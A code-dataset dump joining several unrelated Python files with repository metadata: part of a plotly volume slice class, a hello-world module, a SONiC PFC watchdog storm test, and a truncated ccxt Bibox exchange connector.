Specifies the location(s) of slices on the axis. When
not specified slices would be created for all points of
the axis y except start and end.
locationssrc
Sets the source reference on Chart Studio Cloud for
locations .
show
Determines whether or not slice planes about the y
dimension are drawn.
Returns
-------
Y
"""
super(Y, self).__init__("y")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.volume.slices.Y
constructor must be a dict or
an instance of :class:`plotly.graph_objs.volume.slices.Y`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("fill", None)
_v = fill if fill is not None else _v
if _v is not None:
self["fill"] = _v
_v = arg.pop("locations", None)
_v = locations if locations is not None else _v
if _v is not None:
self["locations"] = _v
_v = arg.pop("locationssrc", None)
_v = locationssrc if locationssrc is not None else _v
if _v is not None:
self["locationssrc"] = _v
_v = arg.pop("show", None)
_v = show if show is not None else _v
if _v is not None:
self["show"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| 28.67907
| 82
| 0.541194
|
794e18468d7c43b4aaf696656dd6b4236b913101
| 51
|
py
|
Python
|
vesselregistration/moduleone.py
|
mjirik/vesselregistration
|
ed0686625560ebb69a7f2fdf527b8d1ab21ae503
|
[
"MIT"
] | null | null | null |
vesselregistration/moduleone.py
|
mjirik/vesselregistration
|
ed0686625560ebb69a7f2fdf527b8d1ab21ae503
|
[
"MIT"
] | null | null | null |
vesselregistration/moduleone.py
|
mjirik/vesselregistration
|
ed0686625560ebb69a7f2fdf527b8d1ab21ae503
|
[
"MIT"
] | null | null | null |
def print_hello(name):
print("Hello " + name)
| 12.75
| 26
| 0.627451
|
794e191b6141569729ce5dc653dc5e9b9fd131a4
| 6,079
|
py
|
Python
|
tests/pfcwd/test_pfcwd_all_port_storm.py
|
shubav/sonic-mgmt
|
0ff71b907a55489bb4ed7d17b1682380fd459bf2
|
[
"Apache-2.0"
] | 132
|
2016-10-19T12:34:44.000Z
|
2022-03-16T09:00:39.000Z
|
tests/pfcwd/test_pfcwd_all_port_storm.py
|
shubav/sonic-mgmt
|
0ff71b907a55489bb4ed7d17b1682380fd459bf2
|
[
"Apache-2.0"
] | 3,152
|
2016-09-21T23:05:58.000Z
|
2022-03-31T23:29:08.000Z
|
tests/pfcwd/test_pfcwd_all_port_storm.py
|
shubav/sonic-mgmt
|
0ff71b907a55489bb4ed7d17b1682380fd459bf2
|
[
"Apache-2.0"
] | 563
|
2016-09-20T01:00:15.000Z
|
2022-03-31T22:43:54.000Z
|
import logging
import os
import pytest
from tests.common.fixtures.conn_graph_facts import fanout_graph_facts
from tests.common.helpers.pfc_storm import PFCMultiStorm
from tests.common.plugins.loganalyzer.loganalyzer import LogAnalyzer
from .files.pfcwd_helper import start_wd_on_ports
TEMPLATES_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "templates")
EXPECT_PFC_WD_DETECT_RE = ".* detected PFC storm .*"
EXPECT_PFC_WD_RESTORE_RE = ".*storm restored.*"
pytestmark = [
pytest.mark.disable_loganalyzer,
pytest.mark.topology('any')
]
logger = logging.getLogger(__name__)
@pytest.fixture(scope='class', autouse=True)
def stop_pfcwd(duthosts, rand_one_dut_hostname):
"""
Fixture that stops PFC Watchdog before each test run
Args:
duthost (AnsibleHost): DUT instance
"""
duthost = duthosts[rand_one_dut_hostname]
logger.info("--- Stop Pfcwd --")
duthost.command("pfcwd stop")
@pytest.fixture(scope='class', autouse=True)
def storm_test_setup_restore(setup_pfc_test, fanout_graph_facts, duthosts, rand_one_dut_hostname, fanouthosts):
"""
Fixture that inits the test vars, start PFCwd on ports and cleans up after the test run
Args:
setup_pfc_test (fixture): module scoped, autouse PFC fixture
fanout_graph_facts (fixture): fanout graph info
duthost (AnsibleHost): DUT instance
fanouthosts (AnsibleHost): fanout instance
Yields:
storm_hndle (PFCStorm): class PFCStorm instance
"""
duthost = duthosts[rand_one_dut_hostname]
setup_info = setup_pfc_test
neighbors = setup_info['neighbors']
port_list = setup_info['port_list']
ports = (" ").join(port_list)
pfc_queue_index = 3
pfc_frames_number = 10000000
pfc_wd_detect_time = 200
pfc_wd_restore_time = 200
pfc_wd_restore_time_large = 30000
peer_params = populate_peer_info(port_list, neighbors, pfc_queue_index, pfc_frames_number)
storm_hndle = set_storm_params(duthost, fanout_graph_facts, fanouthosts, peer_params)
start_wd_on_ports(duthost, ports, pfc_wd_restore_time, pfc_wd_detect_time)
yield storm_hndle
logger.info("--- Storm test cleanup ---")
storm_hndle.stop_pfc_storm()
def populate_peer_info(port_list, neighbors, q_idx, frames_cnt):
"""
Build the peer_info map which will be used by the storm generation class
Args:
port_list (list): set of ports on which the PFC storm needs to be generated
neighbors (dict): fanout info for each DUT port
q_idx (int): queue on which PFC frames need to be generated
frames_cnt (int): Number of PFC frames to generate
Returns:
peer_params (dict): all PFC params needed for each fanout for storm generation
"""
peer_port_map = dict()
for port in port_list:
peer_dev = neighbors[port]['peerdevice']
peer_port = neighbors[port]['peerport']
peer_port_map.setdefault(peer_dev, []).append(peer_port)
peer_params = dict()
for peer_dev in peer_port_map:
peer_port_map[peer_dev] = (',').join(peer_port_map[peer_dev])
peer_params[peer_dev] = {'pfc_frames_number': frames_cnt,
'pfc_queue_index': q_idx,
'intfs': peer_port_map[peer_dev]
}
return peer_params
def set_storm_params(duthost, fanout_graph, fanouthosts, peer_params):
"""
Setup storm parameters
Args:
duthost (AnsibleHost): DUT instance
fanout_graph (fixture): fanout info
fanouthosts (AnsibleHost): fanout instance
peer_params (dict): all PFC params needed for each fanout for storm generation
Returns:
storm_hndle (PFCMultiStorm): class PFCMultiStorm intance
"""
storm_hndle = PFCMultiStorm(duthost, fanout_graph, fanouthosts, peer_params)
storm_hndle.set_storm_params()
return storm_hndle
@pytest.mark.usefixtures('stop_pfcwd', 'storm_test_setup_restore')
class TestPfcwdAllPortStorm(object):
""" PFC storm test class """
def run_test(self, duthost, storm_hndle, expect_regex, syslog_marker, action):
"""
Storm generation/restoration on all ports and verification
Args:
duthost (AnsibleHost): DUT instance
storm_hndle (PFCMultiStorm): class PFCMultiStorm intance
expect_regex (list): list of expect regexs to be matched in the syslog
syslog_marker (string): marker prefix written to the syslog
action (string): storm/restore action
"""
loganalyzer = LogAnalyzer(ansible_host=duthost, marker_prefix=syslog_marker)
ignore_file = os.path.join(TEMPLATES_DIR, "ignore_pfc_wd_messages")
reg_exp = loganalyzer.parse_regexp_file(src=ignore_file)
loganalyzer.ignore_regex.extend(reg_exp)
loganalyzer.expect_regex = []
loganalyzer.expect_regex.extend(expect_regex)
loganalyzer.match_regex = []
with loganalyzer:
if action == "storm":
storm_hndle.start_pfc_storm()
elif action == "restore":
storm_hndle.stop_pfc_storm()
time.sleep(5)
def test_all_port_storm_restore(self, duthosts, rand_one_dut_hostname, storm_test_setup_restore):
"""
Tests PFC storm/restore on all ports
Args:
duthost (AnsibleHost): DUT instance
storm_test_setup_restore (fixture): class scoped autouse setup fixture
"""
duthost = duthosts[rand_one_dut_hostname]
storm_hndle = storm_test_setup_restore
logger.info("--- Testing if PFC storm is detected on all ports ---")
self.run_test(duthost, storm_hndle, expect_regex=[EXPECT_PFC_WD_DETECT_RE], syslog_marker="all_port_storm",
action="storm")
logger.info("--- Testing if PFC storm is restored on all ports ---")
self.run_test(duthost, storm_hndle, expect_regex=[EXPECT_PFC_WD_RESTORE_RE], syslog_marker="all_port_storm_restore",
action="restore")
| 38.232704
| 124
| 0.691232
|
794e198ec6d97e867e51117264495da76ac669ad
| 57,633
|
py
|
Python
|
python/ccxt/async_support/bibox.py
|
ebarti/ccxt
|
da2770a5ec3fa6b18e789f202cdebdab71925f64
|
[
"MIT"
] | null | null | null |
python/ccxt/async_support/bibox.py
|
ebarti/ccxt
|
da2770a5ec3fa6b18e789f202cdebdab71925f64
|
[
"MIT"
] | null | null | null |
python/ccxt/async_support/bibox.py
|
ebarti/ccxt
|
da2770a5ec3fa6b18e789f202cdebdab71925f64
|
[
"MIT"
] | 1
|
2022-03-14T18:27:32.000Z
|
2022-03-14T18:27:32.000Z
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import hashlib
import math
import json
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import AccountSuspended
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.precise import Precise
class bibox(Exchange):
def describe(self):
return self.deep_extend(super(bibox, self).describe(), {
'id': 'bibox',
'name': 'Bibox',
'countries': ['CN', 'US', 'KR'],
'version': 'v1',
'hostname': 'bibox.com',
'has': {
'CORS': None,
'spot': True,
'margin': None, # has but unimplemented
'swap': None, # has but unimplemented
'future': None,
'option': None,
'cancelOrder': True,
'createMarketOrder': None, # or they will return https://github.com/ccxt/ccxt/issues/2338
'createOrder': True,
'fetchBalance': True,
'fetchBorrowRate': False,
'fetchBorrowRates': False,
'fetchClosedOrders': True,
'fetchCurrencies': True,
'fetchDepositAddress': True,
'fetchDeposits': True,
'fetchFundingFees': True,
'fetchMarkets': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTrades': True,
'fetchWithdrawals': True,
'withdraw': True,
},
'timeframes': {
'1m': '1min',
'5m': '5min',
'15m': '15min',
'30m': '30min',
'1h': '1hour',
'2h': '2hour',
'4h': '4hour',
'6h': '6hour',
'12h': '12hour',
'1d': 'day',
'1w': 'week',
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/77257418-3262b000-6c85-11ea-8fb8-20bdf20b3592.jpg',
'api': 'https://api.{hostname}',
'www': 'https://www.bibox365.com',
'doc': [
'https://biboxcom.github.io/en/',
],
'fees': 'https://bibox.zendesk.com/hc/en-us/articles/360002336133',
'referral': 'https://w2.bibox365.com/login/register?invite_code=05Kj3I',
},
'api': {
'public': {
'post': [
# TODO: rework for full endpoint/cmd paths here
'mdata',
],
'get': [
'cquery',
'mdata',
'cdata',
'orderpending',
],
},
'private': {
'post': [
'cquery',
'ctrade',
'user',
'orderpending',
'transfer',
],
},
'v2private': {
'post': [
'assets/transfer/spot',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'taker': self.parse_number('0.001'),
'maker': self.parse_number('0.0008'),
},
'funding': {
'tierBased': False,
'percentage': False,
'withdraw': {},
'deposit': {},
},
},
'exceptions': {
'2011': AccountSuspended, # Account is locked
'2015': AuthenticationError, # Google authenticator is wrong
'2021': InsufficientFunds, # Insufficient balance available for withdrawal
'2027': InsufficientFunds, # Insufficient balance available(for trade)
'2033': OrderNotFound, # operation failed! Orders have been completed or revoked
'2065': InvalidOrder, # Precatory price is exorbitant, please reset
'2066': InvalidOrder, # Precatory price is low, please reset
'2067': InvalidOrder, # Does not support market orders
'2068': InvalidOrder, # The number of orders can not be less than
'2078': InvalidOrder, # unvalid order price
'2085': InvalidOrder, # Order quantity is too small
'2091': RateLimitExceeded, # request is too frequency, please try again later
'2092': InvalidOrder, # Minimum amount not met
'2131': InvalidOrder, # The order quantity cannot be greater than
'3000': BadRequest, # Requested parameter incorrect
'3002': BadRequest, # Parameter cannot be null
'3012': AuthenticationError, # invalid apiKey
'3016': BadSymbol, # Trading pair error
'3024': PermissionDenied, # wrong apikey permissions
'3025': AuthenticationError, # signature failed
'4000': ExchangeNotAvailable, # current network is unstable
'4003': DDoSProtection, # server busy please try again later
},
'commonCurrencies': {
'APENFT(NFT)': 'NFT',
'BOX': 'DefiBox',
'BPT': 'BlockPool Token',
'GTC': 'Game.com',
'KEY': 'Bihu',
'MTC': 'MTC Mesh Network', # conflict with MTC Docademic doc.com Token https://github.com/ccxt/ccxt/issues/6081 https://github.com/ccxt/ccxt/issues/3025
'NFT': 'NFT Protocol',
'PAI': 'PCHAIN',
'REVO': 'Revo Network',
'STAR': 'Starbase',
'TERN': 'Ternio-ERC20',
},
})
async def fetch_markets(self, params={}):
request = {
'cmd': 'pairList',
}
response = await self.publicGetMdata(self.extend(request, params))
#
# {
# "result": [
# {
# "id":1,
# "pair":"BIX_BTC",
# "pair_type":0,
# "area_id":7,
# "is_hide":0,
# "decimal":8,
# "amount_scale":4
# }
# ],
# "cmd":"pairList",
# "ver":"1.1"
# }
#
markets = self.safe_value(response, 'result')
request2 = {
'cmd': 'tradeLimit',
}
response2 = await self.publicGetOrderpending(self.extend(request2, params))
#
# {
# result: {
# min_trade_price: {default: '0.00000001', USDT: '0.0001', DAI: '0.0001'},
# min_trade_amount: {default: '0.0001'},
# min_trade_money: {
# USDT: '1',
# USDC: '1',
# DAI: '1',
# GUSD: '1',
# BIX: '3',
# BTC: '0.0002',
# ETH: '0.005'
# }
# },
# cmd: 'tradeLimit'
# }
#
result2 = self.safe_value(response2, 'result', {})
minCosts = self.safe_value(result2, 'min_trade_money', {})
result = []
for i in range(0, len(markets)):
market = markets[i]
numericId = self.safe_integer(market, 'id')
id = self.safe_string(market, 'pair')
baseId = None
quoteId = None
if id is not None:
parts = id.split('_')
baseId = self.safe_string(parts, 0)
quoteId = self.safe_string(parts, 1)
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
type = 'spot'
spot = True
areaId = self.safe_integer(market, 'area_id')
if areaId == 16:
# TODO: update to v3 api
continue
result.append({
'id': id,
'numericId': numericId,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': None,
'baseId': baseId,
'quoteId': quoteId,
'settleId': None,
'type': type,
'spot': spot,
'margin': False,
'swap': False,
'future': False,
'option': False,
'active': None,
'contract': False,
'linear': None,
'inverse': None,
'contractSize': None,
'expiry': None,
'expiryDatetime': None,
'strike': None,
'optionType': None,
'precision': {
'amount': self.safe_integer(market, 'amount_scale'),
'price': self.safe_integer(market, 'decimal'),
},
'limits': {
'leverage': {
'min': None,
'max': None,
},
'amount': {
'min': None,
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': self.safe_number(minCosts, quoteId),
'max': None,
},
},
'info': market,
})
return result
def parse_ticker(self, ticker, market=None):
# we don't set values that are not defined by the exchange
timestamp = self.safe_integer(ticker, 'timestamp')
symbol = None
if market is not None:
symbol = market['symbol']
else:
baseId = self.safe_string(ticker, 'coin_symbol')
quoteId = self.safe_string(ticker, 'currency_symbol')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
last = self.safe_string(ticker, 'last')
change = self.safe_string(ticker, 'change')
baseVolume = self.safe_string_2(ticker, 'vol', 'vol24H')
percentage = self.safe_string(ticker, 'percent')
if percentage is not None:
percentage = percentage.replace('%', '')
return self.safe_ticker({
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_string(ticker, 'high'),
'low': self.safe_string(ticker, 'low'),
'bid': self.safe_string(ticker, 'buy'),
'bidVolume': self.safe_string(ticker, 'buy_amount'),
'ask': self.safe_string(ticker, 'sell'),
'askVolume': self.safe_string(ticker, 'sell_amount'),
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': percentage,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': self.safe_string(ticker, 'amount'),
'info': ticker,
}, market, False)
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'cmd': 'ticker',
'pair': market['id'],
}
response = await self.publicGetMdata(self.extend(request, params))
return self.parse_ticker(response['result'], market)
async def fetch_tickers(self, symbols=None, params={}):
request = {
'cmd': 'marketAll',
}
response = await self.publicGetMdata(self.extend(request, params))
tickers = self.parse_tickers(response['result'], symbols)
result = self.index_by(tickers, 'symbol')
return self.filter_by_array(result, 'symbol', symbols)
def parse_trade(self, trade, market=None):
timestamp = self.safe_integer_2(trade, 'time', 'createdAt')
side = self.safe_integer_2(trade, 'side', 'order_side')
side = 'buy' if (side == 1) else 'sell'
symbol = None
if market is None:
marketId = self.safe_string(trade, 'pair')
if marketId is None:
baseId = self.safe_string(trade, 'coin_symbol')
quoteId = self.safe_string(trade, 'currency_symbol')
if (baseId is not None) and (quoteId is not None):
marketId = baseId + '_' + quoteId
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
if market is not None:
symbol = market['symbol']
fee = None
feeCostString = self.safe_string(trade, 'fee')
feeCurrency = self.safe_string(trade, 'fee_symbol')
if feeCurrency is not None:
if feeCurrency in self.currencies_by_id:
feeCurrency = self.currencies_by_id[feeCurrency]['code']
else:
feeCurrency = self.safe_currency_code(feeCurrency)
feeRate = None # todo: deduce from market if market is defined
priceString = self.safe_string(trade, 'price')
amountString = self.safe_string(trade, 'amount')
if feeCostString is not None:
fee = {
'cost': Precise.string_neg(feeCostString),
'currency': feeCurrency,
'rate': feeRate,
}
id = self.safe_string(trade, 'id')
return self.safe_trade({
'info': trade,
'id': id,
'order': None, # Bibox does not have it(documented) yet
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': 'limit',
'takerOrMaker': None,
'side': side,
'price': priceString,
'amount': amountString,
'cost': None,
'fee': fee,
}, market)
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'cmd': 'deals',
'pair': market['id'],
}
if limit is not None:
request['size'] = limit # default = 200
response = await self.publicGetMdata(self.extend(request, params))
return self.parse_trades(response['result'], market, since, limit)
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'cmd': 'depth',
'pair': market['id'],
}
if limit is not None:
request['size'] = limit # default = 200
response = await self.publicGetMdata(self.extend(request, params))
return self.parse_order_book(response['result'], symbol, self.safe_number(response['result'], 'update_time'), 'bids', 'asks', 'price', 'volume')
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# "time":1591448220000,
# "open":"0.02507029",
# "high":"0.02507029",
# "low":"0.02506349",
# "close":"0.02506349",
# "vol":"5.92000000"
# }
#
return [
self.safe_integer(ohlcv, 'time'),
self.safe_number(ohlcv, 'open'),
self.safe_number(ohlcv, 'high'),
self.safe_number(ohlcv, 'low'),
self.safe_number(ohlcv, 'close'),
self.safe_number(ohlcv, 'vol'),
]
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=1000, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'cmd': 'kline',
'pair': market['id'],
'period': self.timeframes[timeframe],
'size': limit,
}
response = await self.publicGetMdata(self.extend(request, params))
#
# {
# "result":[
# {"time":1591448220000,"open":"0.02507029","high":"0.02507029","low":"0.02506349","close":"0.02506349","vol":"5.92000000"},
# {"time":1591448280000,"open":"0.02506449","high":"0.02506975","low":"0.02506108","close":"0.02506843","vol":"5.72000000"},
# {"time":1591448340000,"open":"0.02506698","high":"0.02506698","low":"0.02506452","close":"0.02506519","vol":"4.86000000"},
# ],
# "cmd":"kline",
# "ver":"1.1"
# }
#
result = self.safe_value(response, 'result', [])
return self.parse_ohlcvs(result, market, timeframe, since, limit)
async def fetch_currencies(self, params={}):
if self.check_required_credentials(False):
return await self.fetch_currencies_private(params)
else:
return await self.fetch_currencies_public(params)
async def fetch_currencies_public(self, params={}):
request = {
'cmd': 'currencies',
}
response = await self.publicGetCdata(self.extend(request, params))
#
# publicGetCdata
#
# {
# "result":[
# {
# "symbol":"BTC",
# "name":"BTC",
# "valid_decimals":8,
# "original_decimals":8,
# "is_erc20":0,
# "enable_withdraw":1,
# "enable_deposit":1,
# "withdraw_min":0.005,
# "describe_summary":"[{\"lang\":\"zh-cn\",\"text\":\"Bitcoin 比特币的概念最初由中本聪在2009年提出,是点对点的基于 SHA-256 算法的一种P2P形式的数字货币,点对点的传输意味着一个去中心化的支付系统。\"},{\"lang\":\"en-ww\",\"text\":\"Bitcoin is a digital asset and a payment system invented by Satoshi Nakamoto who published a related paper in 2008 and released it as open-source software in 2009. The system featured as peer-to-peer; users can transact directly without an intermediary.\"}]"
# }
# ],
# "cmd":"currencies"
# }
#
currencies = self.safe_value(response, 'result')
result = {}
for i in range(0, len(currencies)):
currency = currencies[i]
id = self.safe_string(currency, 'symbol')
name = self.safe_string(currency, 'name') # contains hieroglyphs causing python ASCII bug
code = self.safe_currency_code(id)
precision = self.safe_integer(currency, 'valid_decimals')
deposit = self.safe_value(currency, 'enable_deposit')
withdraw = self.safe_value(currency, 'enable_withdraw')
active = (deposit and withdraw)
result[code] = {
'id': id,
'code': code,
'info': currency,
'name': name,
'active': active,
'deposit': deposit,
'withdraw': withdraw,
'fee': None,
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision),
'max': None,
},
'withdraw': {
'min': self.safe_number(currency, 'withdraw_min'),
'max': None,
},
},
}
return result
async def fetch_currencies_private(self, params={}):
if not self.check_required_credentials(False):
raise AuthenticationError(self.id + " fetchCurrencies is an authenticated endpoint, therefore it requires 'apiKey' and 'secret' credentials. If you don't need currency details, set exchange.has['fetchCurrencies'] = False before calling its methods.")
request = {
'cmd': 'transfer/coinList',
'body': {},
}
response = await self.privatePostTransfer(self.extend(request, params))
#
# {
# "result":[
# {
# "result":[
# {
# "totalBalance":"14.60987476",
# "balance":"14.60987476",
# "freeze":"0.00000000",
# "id":60,
# "symbol":"USDT",
# "icon_url":"/appimg/USDT_icon.png",
# "describe_url":"[{\"lang\":\"zh-cn\",\"link\":\"https://bibox.zendesk.com/hc/zh-cn/articles/115004798234\"},{\"lang\":\"en-ww\",\"link\":\"https://bibox.zendesk.com/hc/en-us/articles/115004798234\"}]",
# "name":"USDT",
# "enable_withdraw":1,
# "enable_deposit":1,
# "enable_transfer":1,
# "confirm_count":2,
# "is_erc20":1,
# "forbid_info":null,
# "describe_summary":"[{\"lang\":\"zh-cn\",\"text\":\"USDT 是 Tether 公司推出的基于稳定价值货币美元(USD)的代币 Tether USD(简称USDT),1USDT=1美元,用户可以随时使用 USDT 与 USD 进行1:1的兑换。\"},{\"lang\":\"en-ww\",\"text\":\"USDT is a cryptocurrency asset issued on the Bitcoin blockchain via the Omni Layer Protocol. Each USDT unit is backed by a U.S Dollar held in the reserves of the Tether Limited and can be redeemed through the Tether Platform.\"}]",
# "total_amount":4776930644,
# "supply_amount":4642367414,
# "price":"--",
# "contract_father":"OMNI",
# "supply_time":"--",
# "comment":null,
# "chain_type":"OMNI",
# "general_name":"USDT",
# "contract":"31",
# "original_decimals":8,
# "deposit_type":0,
# "hasCobo":0,
# "BTCValue":"0.00027116",
# "CNYValue":"90.36087919",
# "USDValue":"14.61090236",
# "children":[
# {"type":"ERC20","symbol":"eUSDT","enable_deposit":1,"enable_withdraw":1,"confirm_count":13},
# {"type":"TRC20","symbol":"tUSDT","enable_deposit":1,"enable_withdraw":1,"confirm_count":20},
# {"type":"OMNI","symbol":"USDT","enable_deposit":1,"enable_withdraw":1,"confirm_count":2},
# {"type":"HECO","symbol":"hUSDT","enable_deposit":1,"enable_withdraw":1,"confirm_count":12},
# {"type":"BSC(BEP20)","symbol":"bUSDT","enable_deposit":1,"enable_withdraw":1,"confirm_count":5},
# {"type":"HPB","symbol":"pUSDT","enable_deposit":1,"enable_withdraw":1,"confirm_count":20}
# ]
# }
# ],
# "cmd":"transfer/coinList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
currencies = self.safe_value(firstResult, 'result')
result = {}
for i in range(0, len(currencies)):
currency = currencies[i]
id = self.safe_string(currency, 'symbol')
name = currency['name'] # contains hieroglyphs causing python ASCII bug
code = self.safe_currency_code(id)
precision = 8
deposit = self.safe_value(currency, 'enable_deposit')
withdraw = self.safe_value(currency, 'enable_withdraw')
active = (deposit and withdraw)
result[code] = {
'id': id,
'code': code,
'info': currency,
'name': name,
'active': active,
'fee': None,
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'withdraw': {
'min': None,
'max': math.pow(10, precision),
},
},
}
return result
def parse_balance(self, response):
outerResult = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResult, 0, {})
innerResult = self.safe_value(firstResult, 'result')
result = {'info': response}
assetsList = self.safe_value(innerResult, 'assets_list', [])
for i in range(0, len(assetsList)):
balance = assetsList[i]
currencyId = self.safe_string(balance, 'coin_symbol')
code = self.safe_currency_code(currencyId)
account = self.account()
account['free'] = self.safe_string(balance, 'balance')
account['used'] = self.safe_string(balance, 'freeze')
result[code] = account
return self.safe_balance(result)
async def fetch_balance(self, params={}):
await self.load_markets()
type = self.safe_string(params, 'type', 'assets')
params = self.omit(params, 'type')
request = {
'cmd': 'transfer/' + type, # assets, mainAssets
'body': self.extend({
'select': 1, # return full info
}, params),
}
response = await self.privatePostTransfer(request)
#
# {
# "result":[
# {
# "result":{
# "total_btc":"0.00000298",
# "total_cny":"0.99",
# "total_usd":"0.16",
# "assets_list":[
# {"coin_symbol":"BTC","BTCValue":"0.00000252","CNYValue":"0.84","USDValue":"0.14","balance":"0.00000252","freeze":"0.00000000"},
# {"coin_symbol":"LTC","BTCValue":"0.00000023","CNYValue":"0.07","USDValue":"0.01","balance":"0.00006765","freeze":"0.00000000"},
# {"coin_symbol":"USDT","BTCValue":"0.00000023","CNYValue":"0.08","USDValue":"0.01","balance":"0.01252100","freeze":"0.00000000"}
# ]
# },
# "cmd":"transfer/assets"
# }
# ]
# }
#
return self.parse_balance(response)
async def fetch_deposits(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
if limit is None:
limit = 100
request = {
'page': 1,
'size': limit,
}
currency = None
if code is not None:
currency = self.currency(code)
request['symbol'] = currency['id']
response = await self.privatePostTransfer({
'cmd': 'transfer/transferInList',
'body': self.extend(request, params),
})
#
# {
# "result":[
# {
# "result":{
# "count":2,
# "page":1,
# "items":[
# {
# "coin_symbol":"ETH", # token
# "to_address":"xxxxxxxxxxxxxxxxxxxxxxxxxx", # address
# "amount":"1.00000000", # amount
# "confirmCount":"15", # the acknowledgment number
# "createdAt":1540641511000,
# "status":2 # status, 1-deposit is in process,2-deposit finished,3-deposit failed
# },
# {
# "coin_symbol":"BIX",
# "to_address":"xxxxxxxxxxxxxxxxxxxxxxxxxx",
# "amount":"1.00000000",
# "confirmCount":"15",
# "createdAt":1540622460000,
# "status":2
# }
# ]
# },
# "cmd":"transfer/transferInList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result', {})
deposits = self.safe_value(innerResult, 'items', [])
for i in range(0, len(deposits)):
deposits[i]['type'] = 'deposit'
return self.parse_transactions(deposits, currency, since, limit)
async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
if limit is None:
limit = 100
request = {
'page': 1,
'size': limit,
}
currency = None
if code is not None:
currency = self.currency(code)
request['symbol'] = currency['id']
response = await self.privatePostTransfer({
'cmd': 'transfer/transferOutList',
'body': self.extend(request, params),
})
#
# {
# "result":[
# {
# "result":{
# "count":1,
# "page":1,
# "items":[
# {
# "id":612867,
# "coin_symbol":"ETH",
# "chain_type":"ETH",
# "to_address":"0xd41de7a88ab5fc59edc6669f54873576be95bff1",
# "tx_id":"0xc60950596227af3f27c3a1b5911ea1c79bae53bdce67274e48a0ce87a5ef2df8",
# "addr_remark":"binance",
# "amount":"2.34550946",
# "fee":"0.00600000",
# "createdAt":1561339330000,
# "memo":"",
# "status":3
# }
# ]
# },
# "cmd":"transfer/transferOutList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result', {})
withdrawals = self.safe_value(innerResult, 'items', [])
for i in range(0, len(withdrawals)):
withdrawals[i]['type'] = 'withdrawal'
return self.parse_transactions(withdrawals, currency, since, limit)
def parse_transaction(self, transaction, currency=None):
#
# fetchDeposits
#
# {
# 'id': 1023291,
# 'coin_symbol': 'ETH',
# 'to_address': '0x7263....',
# 'amount': '0.49170000',
# 'confirmCount': '16',
# 'createdAt': 1553123867000,
# 'status': 2
# }
#
# fetchWithdrawals
#
# {
# 'id': 521844,
# 'coin_symbol': 'ETH',
# 'to_address': '0xfd4e....',
# 'addr_remark': '',
# 'amount': '0.39452750',
# 'fee': '0.00600000',
# 'createdAt': 1553226906000,
# 'memo': '',
# 'status': 3
# }
#
id = self.safe_string(transaction, 'id')
address = self.safe_string(transaction, 'to_address')
currencyId = self.safe_string(transaction, 'coin_symbol')
code = self.safe_currency_code(currencyId, currency)
timestamp = self.safe_string(transaction, 'createdAt')
tag = self.safe_string(transaction, 'addr_remark')
type = self.safe_string(transaction, 'type')
status = self.parse_transaction_status_by_type(self.safe_string(transaction, 'status'), type)
amount = self.safe_number(transaction, 'amount')
feeCost = self.safe_number(transaction, 'fee')
if type == 'deposit':
feeCost = 0
tag = None
fee = {
'cost': feeCost,
'currency': code,
}
return {
'info': transaction,
'id': id,
'txid': None,
